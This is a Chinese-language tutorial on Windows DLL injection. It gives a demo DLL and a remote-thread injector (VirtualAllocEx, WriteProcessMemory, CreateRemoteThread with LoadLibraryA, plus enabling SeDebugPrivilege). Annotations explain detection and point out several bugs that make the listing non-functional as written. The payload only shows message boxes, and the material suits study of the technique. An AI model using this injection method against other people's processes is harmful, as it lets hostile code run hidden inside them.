【Reverse】DLL注入

2023-06-25

DLL注入就是把一个DLL加载到指定进程的地址空间中，借助该DLL被加载时触发的入口（DllMain）在目标进程内执行代码

DLL注入的大概流程

https://uploader.shimo.im/f/CXFwwkEH6FPM0rtT.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUxNDc0MzAsImciOiJZUXRDRHBXVlJXamRKVjloIiwiaWF0IjoxNjM1MTQ3MTMwLCJ1c2VySWQiOjY5NDQ5MzgzfQ.HwHDdkHUMmhzDbU4xVTOauaQnL9Kxap6PdA19WOYoy0

DLL使用

必备函数

HINSTANCE LoadLibrary(
LPCTSTR lpLibFileName);

【返回值】成功则返回模块句柄,失败返回NULL

流程

创建一个DLL项目

DLL代码
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include<windows.h>
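BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    // Entry point of the demo DLL. Whenever this DLL is mapped into a process
    // (in this tutorial: by a remote thread that calls LoadLibraryA), the
    // loader invokes DllMain with DLL_PROCESS_ATTACH, so the code in that
    // case runs inside the hosting process. That is the whole point of the
    // injection, and also why defenders watch DLL loads that have no
    // legitimate import or LoadLibrary call site.
    //
    // DllMain executes under the loader lock; the Windows docs restrict what
    // may be done here. The MessageBox / CreateThread calls below are a
    // demonstration, not a pattern to copy.
    (void)hModule;    // unused by this demo
    (void)lpReserved; // unused by this demo

    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH: {
        MessageBox(NULL, TEXT("Hacker"), TEXT("DLL Inject"), MB_OK);

        // ThreadProc is declared elsewhere (not part of this listing).
        HANDLE hThread = CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);
        // Read the error code immediately: MessageBox below may overwrite it.
        DWORD dwErr = GetLastError();

        // Format into a TCHAR buffer so the text matches whichever MessageBox
        // (ANSI or Unicode) the build selects. The original sprintf'd into a
        // CHAR[] and cast it to LPCWSTR, which displays garbage in a Unicode
        // build (the TEXT() macros above imply one).
        TCHAR szErrorCode[32];
        wsprintf(szErrorCode, TEXT("%lu"), (unsigned long)dwErr);
        MessageBox(NULL, szErrorCode, TEXT("DLL Inject"), MB_OK);

        if (hThread) {
            MessageBox(NULL, TEXT("Success"), TEXT("DLL Inject"), MB_OK);
            // Closing the handle only drops our reference; the thread keeps running.
            CloseHandle(hThread);
        }
        break;
    }
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    default:
        break;
    }
    return TRUE;
}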

通过LoadLibrary动态调用DLL

关键代码

	HANDLE hModule = ::LoadLibrary("injectDll.dll");

获取DLL中的函数

FARPROC GetProcAddress(
HMODULE hModule,
LPCWSTR lpProcName);
Parameters

将模块句柄和函数名传入,成功则返回目标函数句柄,失败返回NULL

远程线程注入

必备函数

	HANDLE CreateRemoteThread(
HANDLE hProcess, // handle to process
LPSECURITY_ATTRIBUTES lpThreadAttributes, // SD
SIZE_T dwStackSize, // initial stack size
LPTHREAD_START_ROUTINE lpStartAddress, // thread function
LPVOID lpParameter, // thread argument
DWORD dwCreationFlags, // creation option
LPDWORD lpThreadId // thread identifier
);
	//向指定进程的指定空间写入数据
BOOL WriteProcessMemory(
HANDLE hProcess,
LPVOID lpBaseAddress,
LPVOID lpBuffer,
DWORD nSize,
LPDWORD lpNumberOfBytesWritten );
```
//在指定进程中申请一片内存
LPVOID VirtualAllocEx(
HANDLE hProcess, // process to allocate memory
LPVOID lpAddress, // desired starting address
SIZE_T dwSize, // size of region to allocate
DWORD flAllocationType, // type of allocation
DWORD flProtect // type of access protection
);
```

```cpp
// remoteInjectDLLTEST.cpp : Defines the entry point for the console application.
// #include "stdafx.h"
#include<windows.h>
#include<cstdio>
// Prints a label followed by the calling thread's last Win32 error code.
// NOTE(review): GetLastError() returns a DWORD (unsigned long); "%d" is a
// format/argument mismatch and should be "%lu" — left as in the listing.
VOID ShowError(PCHAR msg)
{
    printf("%s Error --Code:%d\n", msg, GetLastError());
}

// Loads the DLL at szDllName into process dwPid by creating a remote thread
// whose start routine is kernel32!LoadLibraryA and whose argument is the DLL
// path copied into the target's address space. This
// OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
// sequence is the classic remote-thread injection pattern and is exactly the
// API sequence that EDR / ETW-based detections are built around.
//
// szDllName must be a path that the *target* process can resolve (main()
// passes an absolute path).
//
// NOTE(review): the function is declared BOOL and maintains bRet, but never
// executes `return bRet;` — falling off the end of a non-void function is
// undefined behaviour. bRet is also never set to TRUE on the success path.
BOOL InjectDll(DWORD dwPid,CHAR szDllName[]){
    HANDLE hProcess = NULL,hRemoteThread = NULL;
    HMODULE hKernel32 = NULL;
    DWORD dwSize = 0;
    LPVOID pDllPathAddr = NULL;
    PVOID pLoadLibraryAddr = NULL;
    BOOL bRet = FALSE;
    hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwPid);
    // NOTE(review): this condition is inverted — a *successful* OpenProcess
    // (non-NULL handle) reports an error and jumps to exit, while a NULL
    // handle falls through. Presumably a transcription error in the listing;
    // the intent is clearly to bail out on NULL.
    if(hProcess){
        ShowError("OpenProcess");
        bRet = FALSE;
        goto exit;
    }
    // Size of the DLL path including its terminating NUL.
    dwSize = strlen(szDllName) + 1;
    // Commit a readable/writable region of that size inside the target process.
    pDllPathAddr = VirtualAllocEx(hProcess,NULL,dwSize,MEM_COMMIT,PAGE_READWRITE);
    // NOTE(review): the `if (pDllPathAddr == NULL)` that should guard this
    // block appears to have been lost from the listing; as written the block
    // is unconditional and the function always leaves here.
    {
        ShowError("VirtualAllocEx");
        bRet = FALSE;
        goto exit;
    }
    // Copy the full DLL path into the region allocated above.
    if (!WriteProcessMemory(hProcess, pDllPathAddr, szDllName, dwSize, NULL))
    {
        ShowError("WriteProcessMemory");
        bRet = FALSE;
        goto exit;
    }
    // The LoadLibraryA address is resolved in *this* process and reused in
    // the target; that only works because kernel32 is mapped at the same
    // base in every process of a boot session.
    hKernel32 = LoadLibrary("Kernel32.dll");
    // NOTE(review): the `if (hKernel32 == NULL)` guard also appears to be
    // missing; this block is unconditional as written.
    {
        ShowError("LoadLibrary");
        bRet = FALSE;
        goto exit;
    }
    // Resolve LoadLibraryA; it becomes the remote thread's start routine.
    pLoadLibraryAddr = GetProcAddress(hKernel32, "LoadLibraryA");
    if (pLoadLibraryAddr == NULL)
    {
        ShowError("GetProcAddress ");
        bRet = FALSE;
        goto exit;
    }
    // Start a thread in the target that executes LoadLibraryA(pDllPathAddr).
    hRemoteThread = CreateRemoteThread(hProcess, NULL, 0,
        (LPTHREAD_START_ROUTINE)pLoadLibraryAddr,
        pDllPathAddr, 0, NULL);
    if (hRemoteThread == NULL)
    {
        ShowError("CreateRemoteThread");
        bRet = FALSE;
        goto exit;
    }
    // NOTE(review): the remote buffer is never released with VirtualFreeEx,
    // so the path string stays allocated in the target for its lifetime.
exit:
    if(hKernel32) FreeLibrary(hKernel32);
    if(hProcess) CloseHandle(hProcess);
    if(hRemoteThread) CloseHandle(hRemoteThread);
}

// Enables SeDebugPrivilege in the current process token so that OpenProcess
// can succeed on processes the caller could not otherwise open. The privilege
// must already be *assigned* to the token (for administrators it is normally
// present but disabled); this only flips it on.
//
// NOTE(review): hToken is never closed on the success path (handle leak), and
// AdjustTokenPrivileges returns TRUE even when the privilege could not be
// enabled — the caller must check GetLastError() == ERROR_NOT_ALL_ASSIGNED.
// All failures are silent, so main() cannot tell whether it gained anything.
void enableDebugPriv()
{
    HANDLE hToken;
    LUID sedebugnameValue;
    TOKEN_PRIVILEGES tkp;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
    {
        return;
    }
    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue))
    {
        CloseHandle(hToken);
        return;
    }
    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Luid = sedebugnameValue;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof tkp, NULL, NULL))
    {
        CloseHandle(hToken);
        return;
    }
}

// Demo driver: target PID and DLL path are hard-coded; argc/argv are unused.
int main(int argc, char* argv[])
{
    enableDebugPriv(); // Enable SeDebugPrivilege first so OpenProcess has a chance on protected targets.
    InjectDll(788,"E:\\Code\\injectDll\\Release\\injectDll.dll"); // PID of the process to inject into, and the (absolute) path of the DLL to load.
    return 0;
}
```

【Reverse】DLL注入的相关教程结束。
